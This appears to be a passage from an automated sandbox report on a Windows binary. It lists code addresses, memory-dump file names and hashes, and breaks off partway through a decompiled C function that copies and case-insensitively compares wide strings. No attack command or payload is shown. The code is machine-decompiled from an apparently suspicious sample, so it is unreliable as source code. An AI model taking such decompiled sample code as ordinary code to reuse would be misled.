0x6e7a8bf9
0x6e7a8be8
0x6e7a8be8
0x6e7a8bea
0x6e7a91fe
0x6e7a9202
0x6e7a9202
0x6e7a8bf0
0x6e7a8bf0
0x6e7a908a
0x6e7a908c
0x6e7a908c
0x6e7a908f
0x6e7a90af
0x6e7a90b3
0x6e7a90bf
0x6e7a90bf
0x6e7a90c5
0x6e7a90c5
0x6e7a90ca
0x6e7a90ce
0x6e7a90d2
0x6e7a90d4
0x00000000
0x00000000
0x6e7a90da
0x6e7a90dd
0x6e7a90df
0x00000000
0x6e7a90e1
0x6e7a90e1
0x6e7a90e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a90e7
0x00000000
0x6e7a90df
0x6e7a926c
0x6e7a9271
0x00000000
0x6e7a9091
0x6e7a9091
0x6e7a9093
0x6e7a9095
0x6e7a90e9
0x6e7a90e9
0x6e7a90ed
0x6e7a90ef
0x00000000
0x00000000
0x6e7a90f5
0x6e7a90f6
0x6e7a90fc
0x00000000
0x6e7a90fe
0x6e7a90fe
0x6e7a90fe
0x6e7a90fe
0x00000000
0x6e7a90fc
0x00000000
0x6e7a9097
0x6e7a909c
0x6e7a909c
0x6e7a909e
0x6e7a909e
0x6e7a90a2
0x6e7a90a4
0x00000000
0x00000000
0x6e7a90aa
0x6e7a90ab
0x6e7a90ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a90ad
0x6e7a9259
0x6e7a9259
0x6e7a925c
0x6e7a9264
0x6e7a9264
0x6e7a925c
0x6e7a9095
0x6e7a908f
0x6e7a9103
0x6e7a9108
0x6e7a9108
0x6e7a910b
0x6e7a910e
0x6e7a9111
0x6e7a9115
0x6e7a9125
0x6e7a9128
0x6e7a9128
0x6e7a912e
0x6e7a9136
0x6e7a9136
0x6e7a9136
0x6e7a9139
0x6e7a913e
0x6e7a9148
0x6e7a914c
0x6e7a9152
0x6e7a9154
0x6e7a9157
0x6e7a9159
0x6e7a919b
0x6e7a919d
0x6e7a915b
0x6e7a915b
0x6e7a915d
0x6e7a915f
0x6e7a9162
0x6e7a9165
0x6e7a9167
0x6e7a9169
0x6e7a9169
0x6e7a916b
0x6e7a916b
0x6e7a916c
0x6e7a9171
0x6e7a9176
0x6e7a9178
0x00000000
0x00000000
0x6e7a917a
0x6e7a917e
0x6e7a9182
0x6e7a9184
0x00000000
0x00000000
0x00000000
0x6e7a9184
0x6e7a916b
0x6e7a9167
0x6e7a9186
0x6e7a9186
0x6e7a9188
0x6e7a9189
0x6e7a918d
0x6e7a9192
0x6e7a9196
0x6e7a9196
0x6e7a91a0
0x6e7a91a0
0x6e7a91a8
0x6e7a91ac
0x6e7a8bfd
0x6e7a8bfd
0x6e7a8bfd
0x6e7a8c04
0x6e7a8c07
0x6e7a8c09
0x6e7a8c0b
0x00000000
0x00000000
0x6e7a8c14
0x6e7a8c16
0x6e7a8e0d
0x6e7a8e0f
0x00000000
0x6e7a8e15
0x6e7a8e17
0x6e7a8e17
0x6e7a8e1a
0x6e7a8e36
0x6e7a8e3a
0x6e7a8e46
0x6e7a8e46
0x6e7a8e4c
0x6e7a8e4c
0x6e7a8e51
0x6e7a8e55
0x6e7a8e59
0x6e7a8e5b
0x00000000
0x00000000
0x6e7a8e61
0x6e7a8e64
0x6e7a8e66
0x00000000
0x6e7a8e68
0x6e7a8e68
0x6e7a8e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8e6e
0x00000000
0x6e7a8e66
0x6e7a928e
0x6e7a9293
0x6e7a8e1c
0x6e7a8e1c
0x6e7a8e1e
0x6e7a8e20
0x6e7a8e70
0x6e7a8e70
0x6e7a8e74
0x6e7a8e76
0x00000000
0x00000000
0x6e7a8e78
0x6e7a8e79
0x6e7a8e7f
0x00000000
0x6e7a8e81
0x6e7a8e81
0x6e7a8e81
0x6e7a8e81
0x00000000
0x6e7a8e7f
0x6e7a8e22
0x6e7a8e27
0x6e7a8e27
0x6e7a8e29
0x6e7a8e29
0x6e7a8e2d
0x6e7a8e2f
0x00000000
0x00000000
0x6e7a8e31
0x6e7a8e32
0x6e7a8e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8e34
0x6e7a8e29
0x6e7a8e20
0x6e7a8e86
0x6e7a8e86
0x6e7a8e88
0x6e7a9287
0x6e7a8e8e
0x6e7a8e90
0x6e7a8e90
0x6e7a8e93
0x6e7a8ebc
0x6e7a8ec0
0x6e7a8ecc
0x6e7a8ed0
0x6e7a8ed0
0x6e7a8ed5
0x6e7a8ed5
0x6e7a8eda
0x6e7a8ede
0x6e7a8ee2
0x6e7a8ee4
0x00000000
0x00000000
0x6e7a8eea
0x6e7a8eed
0x6e7a8eef
0x00000000
0x6e7a8ef1
0x6e7a8ef1
0x6e7a8ef5
0x6e7a8efa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8efa
0x00000000
0x6e7a8eef
0x6e7a9277
0x6e7a927a
0x6e7a927c
0x6e7a9280
0x6e7a8e95
0x6e7a8e95
0x6e7a8e97
0x6e7a8e9a
0x6e7a8efc
0x6e7a8efc
0x6e7a8f00
0x6e7a8f02
0x00000000
0x00000000
0x6e7a8f04
0x6e7a8f05
0x6e7a8f0a
0x00000000
0x6e7a8f0c
0x6e7a8f0c
0x6e7a8f0c
0x6e7a8f0c
0x00000000
0x6e7a8f0a
0x6e7a8e9c
0x6e7a8ea1
0x6e7a8ea1
0x6e7a8ea3
0x6e7a8ea7
0x6e7a8eab
0x6e7a8ead
0x00000000
0x00000000
0x6e7a8eb3
0x6e7a8eb4
0x6e7a8eb6
0x00000000
0x6e7a8eb8
0x6e7a8eb8
0x00000000
0x6e7a8eb8
0x00000000
0x6e7a8eb6
0x6e7a9220
0x6e7a9220
0x6e7a8e9a
0x6e7a8e93
0x6e7a8f11
0x6e7a8f11
0x6e7a8f11
0x6e7a8f15
0x6e7a8f17
0x6e7a8f40
0x6e7a8f43
0x6e7a8f46
0x6e7a8f4a
0x00000000
0x00000000
0x00000000
0x6e7a8f19
0x6e7a8f19
0x6e7a8f1b
0x6e7a9229
0x6e7a922e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8f21
0x6e7a8f21
0x6e7a8f23
0x6e7a8f26
0x6e7a8f2b
0x6e7a8f34
0x6e7a8f34
0x6e7a8f50
0x6e7a8f5a
0x6e7a8f5d
0x6e7a8f5d
0x6e7a8f62
0x6e7a8f6a
0x6e7a8f6a
0x6e7a8f6a
0x6e7a8f6b
0x6e7a8f75
0x6e7a8f7f
0x6e7a8f83
0x6e7a8f84
0x6e7a8f88
0x6e7a8f8d
0x6e7a8f91
0x6e7a8f93
0x6e7a8f96
0x6e7a8f98
0x6e7a8fea
0x6e7a8fec
0x6e7a8f9a
0x6e7a8f9a
0x6e7a8f9c
0x6e7a8f9e
0x6e7a8fa1
0x6e7a8fa4
0x6e7a8fa6
0x6e7a8fa8
0x6e7a8fac
0x6e7a8fac
0x6e7a8fae
0x6e7a8fae
0x6e7a8faf
0x6e7a8fb4
0x6e7a8fb9
0x6e7a8fbb
0x00000000
0x00000000
0x6e7a8fbd
0x6e7a8fc1
0x6e7a8fc5
0x6e7a8fc7
0x00000000
0x00000000
0x00000000
0x6e7a8fc7
0x6e7a8fc9
0x6e7a8fc9
0x6e7a8fa6
0x6e7a8fcd
0x6e7a8fcf
0x6e7a8fd0
0x6e7a8fd4
0x6e7a8fd8
0x6e7a8fdd
0x6e7a8fe1
0x6e7a8fe5
0x6e7a8fe5
0x6e7a8fef
0x6e7a8ff1
0x6e7a8ff1
0x6e7a8ff3
0x6e7a8ff5
0x6e7a9234
0x6e7a9238
0x6e7a9239
0x6e7a923b
0x6e7a924a
0x6e7a924f
0x6e7a9251
0x00000000
0x6e7a923d
0x6e7a9241
0x6e7a9243
0x00000000
0x6e7a9245
0x00000000
0x6e7a9245
0x00000000
0x6e7a9243
0x6e7a8ffb
0x6e7a8ffb
0x00000000
0x6e7a8ffb
0x6e7a8f2d
0x6e7a8f2d
0x6e7a8ffe
0x6e7a8ffe
0x6e7a9000
0x6e7a9002
0x6e7a9006
0x6e7a9006
0x6e7a9008
0x6e7a900c
0x6e7a900c
0x6e7a900d
0x6e7a9014
0x6e7a9017
0x6e7a9019
0x00000000
0x00000000
0x6e7a901e
0x6e7a9020
0x6e7a9022
0x00000000
0x00000000
0x00000000
0x6e7a9022
0x6e7a9024
0x6e7a9028
0x6e7a9028
0x6e7a902c
0x6e7a902e
0x6e7a9030
0x6e7a9039
0x00000000
0x00000000
0x6e7a9032
0x6e7a9032
0x6e7a903b
0x6e7a903b
0x6e7a9043
0x6e7a9047
0x6e7a904b
0x6e7a904f
0x6e7a904f
0x6e7a9053
0x6e7a9057
0x6e7a9059
0x00000000
0x00000000
0x6e7a905b
0x6e7a905b
0x6e7a905f
0x6e7a9060
0x6e7a9062
0x00000000
0x00000000
0x00000000
0x6e7a9062
0x6e7a9064
0x6e7a9068
0x6e7a9068
0x6e7a906c
0x6e7a906e
0x6e7a906f
0x6e7a9076
0x6e7a9078
0x6e7a91d6
0x6e7a91d6
0x6e7a91db
0x6e7a91dd
0x6e7a8c3b
0x6e7a8c3b
0x6e7a8c3e
0x6e7a8c40
0x6e7a8d95
0x6e7a8d95
0x6e7a8d9f
0x6e7a8da1
0x6e7a8da7
0x6e7a8da9
0x6e7a8dab
0x6e7a8de5
0x6e7a8de7
0x6e7a8dad
0x6e7a8dad
0x6e7a8daf
0x6e7a8db1
0x6e7a8db4
0x6e7a8db7
0x6e7a8db9
0x6e7a8dbb
0x6e7a8dbb
0x6e7a8dbd
0x6e7a8dbd
0x6e7a8dbe
0x6e7a8dc3
0x6e7a8dc8
0x6e7a8dca
0x00000000
0x00000000
0x6e7a8dcc
0x6e7a8dd0
0x6e7a8dd4
0x6e7a8dd6
0x00000000
0x00000000
0x00000000
0x6e7a8dd6
0x6e7a8dbd
0x6e7a8db9
0x6e7a8dd8
0x6e7a8dd8
0x6e7a8dda
0x6e7a8ddb
0x6e7a8de0
0x6e7a8de0
0x6e7a8dea
0x6e7a8ded
0x6e7a8def
0x6e7a8c46
0x6e7a8c48
0x6e7a8c48
0x6e7a8c4b
0x6e7a8c68
0x6e7a8c6c
0x6e7a8c78
0x6e7a8c78
0x6e7a8c7e
0x6e7a8c7e
0x6e7a8c83
0x6e7a8c87
0x6e7a8c8b
0x6e7a8c8d
0x00000000
0x00000000
0x6e7a8c93
0x6e7a8c96
0x6e7a8c98
0x00000000
0x6e7a8c9a
0x6e7a8c9a
0x6e7a8ca0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8ca0
0x00000000
0x6e7a8c98
0x6e7a9214
0x6e7a9219
0x6e7a8c4d
0x6e7a8c4d
0x6e7a8c4f
0x6e7a8c52
0x6e7a8ca2
0x6e7a8ca2
0x6e7a8ca6
0x6e7a8ca8
0x00000000
0x00000000
0x6e7a8caa
0x6e7a8cab
0x6e7a8cb1
0x00000000
0x6e7a8cb3
0x6e7a8cb3
0x6e7a8cb3
0x6e7a8cb3
0x00000000
0x6e7a8cb1
0x6e7a8c54
0x6e7a8c59
0x6e7a8c59
0x6e7a8c5b
0x6e7a8c5b
0x6e7a8c5f
0x6e7a8c61
0x00000000
0x00000000
0x6e7a8c63
0x6e7a8c64
0x6e7a8c66
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8c66
0x6e7a8c5b
0x6e7a8c52
0x6e7a8cb8
0x6e7a8cbd
0x6e7a8cbd
0x6e7a8cc0
0x6e7a8cc3
0x6e7a8cc6
0x6e7a8cc8
0x6e7a8cdb
0x6e7a8cde
0x6e7a8cde
0x6e7a8ce4
0x6e7a8cec
0x6e7a8cec
0x6e7a8cec
0x6e7a8ced
0x6e7a8cf7
0x6e7a8cfe
0x6e7a8cff
0x6e7a8d02
0x6e7a8d07
0x6e7a8d0d
0x6e7a8d0f
0x6e7a8d11
0x6e7a8d5b
0x6e7a8d5d
0x6e7a8d13
0x6e7a8d13
0x6e7a8d15
0x6e7a8d17
0x6e7a8d1a
0x6e7a8d1d
0x6e7a8d1f
0x6e7a8d21
0x6e7a8d25
0x6e7a8d25
0x6e7a8d27
0x6e7a8d27
0x6e7a8d28
0x6e7a8d2d
0x6e7a8d32
0x6e7a8d34
0x00000000
0x00000000
0x6e7a8d36
0x6e7a8d3a
0x6e7a8d3e
0x6e7a8d40
0x00000000
0x00000000
0x00000000
0x6e7a8d40
0x6e7a8d42
0x6e7a8d42
0x6e7a8d1f
0x6e7a8d46
0x6e7a8d48
0x6e7a8d49
0x6e7a8d4d
0x6e7a8d52
0x6e7a8d56
0x6e7a8d56
0x6e7a8d60
0x6e7a8d63
0x6e7a8d66
0x6e7a8cca
0x6e7a8cca
0x6e7a8cca
0x6e7a8d68
0x6e7a8d6a
0x6e7a8d6c
0x6e7a8d72
0x6e7a8d7c
0x6e7a8d7c
0x6e7a8d7f
0x6e7a8d80
0x6e7a8d83
0x6e7a8d85
0x00000000
0x00000000
0x6e7a8d87
0x6e7a8d89
0x6e7a920b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8d8f
0x6e7a8d8f
0x6e7a8d91
0x6e7a8d76
0x6e7a8d79
0x6e7a8d79
0x00000000
0x6e7a8d79
0x00000000
0x6e7a8d91
0x6e7a8d7c
0x6e7a8d6c
0x6e7a907e
0x6e7a9082
0x6e7a9084
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a9084
0x6e7a9078
0x6e7a8f2b
0x6e7a8f1b
0x6e7a8f17
0x6e7a8c1c
0x6e7a8c1c
0x6e7a8c1c
0x6e7a8c20
0x00000000
0x6e7a8c20
0x00000000
0x6e7a8c16
0x6e7a929a
0x6e7a929c
0x00000000
0x6e7a929c
0x00000000
0x6e7a8c24
0x6e7a8c24
0x6e7a8c25
0x6e7a8c25
0x00000000
0x6e7a8be4
0x6e7a8b19
0x6e7a8b12
0x6e7a8a8b
0x6e7a8df6
0x6e7a8df6
0x6e7a8df8
0x6e7a8df9
0x6e7a8e0a
0x6e7a8a04
0x6e7a8a04
0x6e7a8a07
0x6e7a8a09
0x6e7a8a0e
0x6e7a8a10
0x6e7a8a18
0x6e7a8a1a
0x6e7a8a20
0x6e7a8a24
0x6e7a8a5c
0x6e7a8a26
0x6e7a8a28
0x6e7a8a2a
0x6e7a8a2d
0x6e7a8a32
0x6e7a8a34
0x6e7a8a34
0x6e7a8a35
0x6e7a8a3a
0x6e7a8a41
0x00000000
0x00000000
0x6e7a8a43
0x6e7a8a47
0x6e7a8a4d
0x00000000
0x00000000
0x00000000
0x6e7a8a4d
0x6e7a8a34
0x6e7a8a32
0x6e7a8a4f
0x6e7a8a4f
0x6e7a8a51
0x6e7a8a52
0x6e7a8a57
0x6e7a8a57
0x6e7a8a5f
0x6e7a8a62
0x6e7a8a69
0x6e7a8a74
0x6e7a8a74
0x00000000

Strings

@, xrefs: 6E7A9229

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction ID: 82e6530884e8e4f1623fc8b60ee72651278ca63143331890fb5e4d308dfd2330
Opcode Fuzzy Hash: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction Fuzzy Hash: A3423671A043538BE7448FADCA5422A72E2EFD5350F15873DEAA5CB3A4EB35C851CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E79AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E79AE80(intOrPtr* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __esi;
				signed short* _t229;
				unsigned int _t237;
				signed int _t238;
				signed short** _t243;
				signed short* _t244;
				signed short* _t248;
				signed int* _t250;
				signed int _t255;
				signed int _t259;
				signed int _t264;
				signed int _t268;
				signed int _t271;
				unsigned int _t277;
				signed int _t278;
				void* _t284;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed short* _t298;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed short* _t334;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr* _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t407;
				signed int _t408;
				signed short* _t411;
				signed int* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t452;
				signed int _t455;
				intOrPtr* _t458;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				unsigned int _t465;
				unsigned int _t466;
				signed int _t467;
				unsigned int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				void* _t481;

				_v64 = 0;
				_t458 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t441 = E6E791030();
				_t481 = (_t478 & 0xfffffff0) - 0x34 + 4;
				_t229 = _v64;
				if(_t229 == 0) {
					__eflags = 0;
					 *_t441 = 0;
				} else {
					if(_t441 != 0) {
						_t384 =  *_t229 & 0x0000ffff;
						 *_t441 = _t384;
						if(_t384 != 0) {
							while(1) {
								_t384 = 1;
								_t382 = _t229[1] & 0x0000ffff;
								 *(_t441 + 2) = _t382;
								if(_t382 == 0) {
									goto L6;
								}
								_t383 = _t229[2] & 0x0000ffff;
								 *(_t441 + 4) = _t383;
								if(_t383 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(2);
					_push(_t229);
					E6E7910B0();
					_t481 = _t481 + 8;
				}
				_v60 = 0x40;
				_v64 = _t441;
				if((_a8 & 0x0000ffff) != 0) {
					__eflags = _t441;
					if(_t441 == 0) {
						_t349 = 0x40;
						_t316 = 0;
					} else {
						_t309 = _t441 & 0x0000000f;
						__eflags = _t309;
						if(_t309 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t346 =  ~( ~_t309 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t346;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t384;
								if(_t384 != 0) {
									break;
								}
								_t309 = _t309 + 8;
								__eflags = _t309 - _t346;
								if(_t309 < _t346) {
									continue;
								} else {
									__eflags = _t346 - 0x7fffffff;
									if(_t346 >= 0x7fffffff) {
										goto L22;
									} else {
										goto L20;
									}
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t316 = (_t346 >> 1) + _t309;
							goto L126;
						} else {
							_t346 = 0;
							__eflags = _t309 & 0x00000001;
							if((_t309 & 0x00000001) != 0) {
								while(1) {
									L20:
									__eflags =  *(_t441 + _t346 * 2) & 0x0000ffff;
									if(( *(_t441 + _t346 * 2) & 0x0000ffff) == 0) {
										goto L126;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - 0x7fffffff;
									if(_t346 < 0x7fffffff) {
										continue;
									} else {
										L22:
										_t349 = 0x40;
										_t316 = 0x7fffffff;
									}
									goto L23;
								}
								goto L126;
							} else {
								_t309 =  ~_t309 + 0x10 >> 1;
								__eflags = _t309;
								while(1) {
									_t384 =  *(_t441 + _t346 * 2) & 0x0000ffff;
									__eflags = _t384;
									if(_t384 == 0) {
										break;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - _t309;
									if(_t346 < _t309) {
										continue;
									} else {
										goto L16;
									}
									goto L23;
								}
								L126:
								__eflags = _t316 - 0xfffffffe;
								if(_t316 != 0xfffffffe) {
									_t349 = 0x40;
								} else {
									 *_t441 = 0;
									_t349 = _v60;
								}
							}
						}
					}
					L23:
					_t24 = _t316 + 2; // 0x2
					_t385 = _t24;
					__eflags = _t385 - 0x40;
					_t386 =  <=  ? 0x40 : _t385;
					__eflags = _t349 - _t386;
					if(_t349 < _t386) {
						_t237 = (_t386 >> 5 >> 0x1a) + _t386 >> 6;
						_t387 = _t386 & 0x8000003f;
						__eflags = _t387;
						if(_t387 < 0) {
							_t387 = (_t387 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t387;
						}
						__eflags = _t387;
						_t238 = _t237 + (0 | _t387 > 0x00000000);
						_push(_t238 << 7);
						_t443 = _t238 << 6;
						_t390 = E6E791030();
						_t481 = _t481 + 4;
						_t350 = _v64;
						__eflags = _t350;
						if(_t350 == 0) {
							__eflags = 0;
							 *_t390 = 0;
						} else {
							__eflags = _t390;
							if(_t390 != 0) {
								_t306 =  *_t350 & 0x0000ffff;
								 *_t390 = _t306;
								__eflags = _t306;
								if(_t306 != 0) {
									_v68 = _t458;
									_t307 = 0;
									__eflags = 0;
									while(1) {
										_t307 = _t307 + 1;
										_t476 =  *(_t350 + _t307 * 4 - 2) & 0x0000ffff;
										 *(_t390 + _t307 * 4 - 2) = _t476;
										__eflags = _t476;
										if(_t476 == 0) {
											break;
										}
										_t477 =  *(_t350 + _t307 * 4) & 0x0000ffff;
										 *(_t390 + _t307 * 4) = _t477;
										__eflags = _t477;
										if(_t477 != 0) {
											continue;
										}
										break;
									}
									_t458 = _v68;
								}
							}
							_push(2);
							_push(_t350);
							_v68 = _t390;
							E6E7910B0();
							_t390 = _v68;
							_t481 = _t481 + 8;
						}
						_v60 = _t443;
						_v64 = _t390;
					} else {
						_t390 = _v64;
					}
					 *((short*)(_t390 + _t316 * 2)) = _a8 & 0x0000ffff;
					__eflags = 0;
					_t243 =  &_v64;
					 *((short*)(_v64 + 2 + _t316 * 2)) = 0;
				} else {
					_t243 =  &_v64;
				}
				_t244 =  *_t243;
				_v28 = _t244;
				if(_t244 == 0) {
					L40:
					_t392 = _a4;
					_push(0x80);
					 *_t392 = 0;
					 *((intOrPtr*)(_t392 + 4)) = 0;
					_t317 = E6E791030();
					_t481 = _t481 + 4;
					_t248 =  *_a4;
					if(_t248 == 0) {
						 *_t317 = 0;
					} else {
						if(_t317 != 0) {
							_t393 =  *_t248 & 0x0000ffff;
							 *_t317 = _t393;
							if(_t393 != 0) {
								_t394 = 0;
								while(1) {
									_t394 = _t394 + 1;
									_t352 =  *(_t248 + _t394 * 4 - 2) & 0x0000ffff;
									 *(_t317 + _t394 * 4 - 2) = _t352;
									if(_t352 == 0) {
										goto L46;
									}
									_t353 =  *(_t248 + _t394 * 4) & 0x0000ffff;
									 *(_t317 + _t394 * 4) = _t353;
									if(_t353 != 0) {
										continue;
									}
									goto L46;
								}
							}
						}
						L46:
						_push(2);
						_push(_t248);
						E6E7910B0();
						_t481 = _t481 + 8;
					}
					goto L124;
				} else {
					_t319 =  *_t244 & 0x0000ffff;
					if(_t319 != 0) {
						_t460 =  *_t458;
						_t255 = E6E79FB60(_t460, _t244, _t460);
						__eflags = _t255;
						if(_t255 == 0) {
							_t396 = _a4;
							_push(0x80);
							 *_t396 = 0;
							 *((intOrPtr*)(_t396 + 4)) = 0;
							_t317 = E6E791030();
							_t481 = _t481 + 4;
							_t259 =  *_a4;
							__eflags = _t259;
							if(_t259 == 0) {
								 *_t317 = 0;
							} else {
								__eflags = _t317;
								if(_t317 != 0) {
									_t397 =  *_t259 & 0x0000ffff;
									 *_t317 = _t397;
									__eflags = _t397;
									if(_t397 != 0) {
										_t398 = 0;
										__eflags = 0;
										while(1) {
											_t398 = _t398 + 1;
											_t355 =  *(_t259 + _t398 * 4 - 2) & 0x0000ffff;
											 *(_t317 + _t398 * 4 - 2) = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												goto L176;
											}
											_t356 =  *(_t259 + _t398 * 4) & 0x0000ffff;
											 *(_t317 + _t398 * 4) = _t356;
											__eflags = _t356;
											if(_t356 != 0) {
												continue;
											}
											goto L176;
										}
									}
								}
								L176:
								_push(2);
								_push(_t259);
								E6E7910B0();
								_t481 = _t481 + 8;
							}
							goto L124;
						} else {
							_t66 = _t319 - 0x41; // 0x7fffffbe
							__eflags = _t66 - 0x19;
							_t67 = _t319 + 0x20; // 0x8000001f
							_v40 = _t460;
							_t320 =  <=  ? _t67 : _t319;
							_t400 = _v28 & 0x0000000f;
							_t358 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							asm("pxor xmm0, xmm0");
							_v36 =  ~_t400 + 0x10 >> 1;
							_v32 = _t400 & 0x00000001;
							_t448 = 0;
							__eflags = 0;
							_v44 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							while(1) {
								L50:
								_t325 = _t255;
								_t462 = _t255 + 2;
								__eflags = _t462;
								if(_t462 == 0) {
									break;
								}
								__eflags =  *(_t255 + 2) & 0x0000ffff;
								if(( *(_t255 + 2) & 0x0000ffff) == 0) {
									break;
								} else {
									_v52 = _t400;
									_t368 = _t448;
									_v68 = _t325;
									while(1) {
										_t368 = _t368 + 1;
										_t334 = _t255 + _t368 * 2;
										_t429 =  *_t334 & 0x0000ffff;
										__eflags = ( *(_t462 + _t368 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
										_v48 = _t334;
										_t448 = _v44;
										_t430 =  <=  ? _t429 + 0x20 : _t429;
										__eflags = ( <=  ? _t429 + 0x20 : _t429) - _t448;
										if(( <=  ? _t429 + 0x20 : _t429) == _t448) {
											break;
										}
										__eflags =  *(_t462 + _t368 * 2) & 0x0000ffff;
										if(( *(_t462 + _t368 * 2) & 0x0000ffff) != 0) {
											continue;
										} else {
											L55:
											_t325 = _v68;
											_t463 = _v40;
										}
										goto L56;
									}
									_t400 = _v52;
									_t301 = _v48;
									_t452 = _v36;
									_t465 = _v32;
									while(1) {
										_t336 = _t400;
										__eflags = _t400;
										if(_t400 == 0) {
											goto L141;
										}
										L136:
										_t377 = 0;
										__eflags = _t465;
										if(_t465 != 0) {
											L145:
											_v32 = _t465;
											_t474 = _v28;
											while(1) {
												__eflags =  *(_t474 + _t377 * 2) & 0x0000ffff;
												if(( *(_t474 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - 0x7fffffff;
												if(_t377 < 0x7fffffff) {
													continue;
												} else {
													_t466 = _v32;
													goto L149;
												}
												goto L180;
											}
											_t466 = _v32;
											goto L159;
										} else {
											_v32 = _t465;
											_t336 = _t452;
											_v24 = _t301;
											_t475 = _v28;
											while(1) {
												__eflags =  *(_t475 + _t377 * 2) & 0x0000ffff;
												if(( *(_t475 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - _t452;
												if(_t377 < _t452) {
													continue;
												} else {
													_t301 = _v24;
													_t465 = _v32;
													goto L141;
												}
												goto L180;
											}
											_t301 = _v24;
											_t466 = _v32;
											L159:
											__eflags = _t377;
											if(__eflags == 0) {
												L149:
												_t377 = 0x7fffffff;
												goto L150;
											} else {
												if(__eflags > 0) {
													L150:
													_v56 = _t377;
													_t337 = 0;
													__eflags = 0;
													_v52 = _t400;
													_v36 = _t452;
													_v32 = _t466;
													while(1) {
														_t467 =  *(_t301 + _t337 * 2) & 0x0000ffff;
														_t455 =  *(_v28 + _t337 * 2) & 0x0000ffff;
														__eflags = _t467 - 0x61 - 0x19;
														_t468 =  <=  ? _t467 - 0x20 : _t467;
														_t432 = ( <=  ? _t467 - 0x20 : _t467) & 0x0000ffff;
														__eflags = _t455 - 0x61 - 0x19;
														_t456 =  <=  ? _t455 - 0x20 : _t455;
														__eflags = _t432 - ( <=  ? _t455 - 0x20 : _t455);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t432;
														if(_t432 == 0) {
															L155:
															_t400 = _v52;
															_t448 = 0;
															__eflags = 0;
															_t325 = _v68;
															goto L156;
														} else {
															_t337 = _t337 + 1;
															__eflags = _t337 - _v56;
															if(_t337 < _v56) {
																continue;
															} else {
																goto L155;
															}
														}
														goto L180;
													}
													_t433 = _v52;
													_t448 = _v36;
													_t470 = _v32;
													_t339 = _t301 + 2;
													__eflags = _t339;
													if(_t339 == 0) {
														goto L55;
													} else {
														__eflags =  *(_t301 + 2) & 0x0000ffff;
														if(( *(_t301 + 2) & 0x0000ffff) == 0) {
															goto L55;
														} else {
															_v52 = _t433;
															_t381 = 0;
															__eflags = 0;
															_v24 = _t301;
															_v36 = _t448;
															_v32 = _t470;
															while(1) {
																_t381 = _t381 + 1;
